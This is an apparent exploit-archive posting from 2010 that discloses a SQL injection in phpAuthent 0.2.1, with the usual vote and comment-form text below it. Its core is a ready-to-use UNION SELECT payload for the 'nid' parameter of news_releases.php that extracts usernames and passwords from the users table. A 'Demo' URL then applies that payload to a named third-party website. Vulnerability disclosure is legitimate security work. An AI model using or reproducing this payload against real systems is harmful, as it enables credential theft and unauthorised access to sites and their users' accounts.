phpAuthent 0.2.1 remote SQL injection

2010.03.20

Credit: Gamoscu

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

phpAuthent 0.2.1 SQL Injection  Vulnerability  
    
########################### 
    
Author    : Gamoscu 
 
Homepage  : http://www.1923turk.com  

Blog      : http://gamoscu.wordpress.com/  

Script    : phpAuthent http://phpauth.sourceforge.net/

Download  : http://phpauth.sourceforge.net/download.php 
    
###########################   
      
[ Vulnerable File ] 
  
news_releases.php?nid= [ SQL ] 
       
[ XpL ] 
    
-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users
  
[ Demo] 
      
http://www.nok4444444444444444444444ers.com/news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

phpAuthent 0.2.1 remote SQL injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

phpAuthent 0.2.1 remote SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.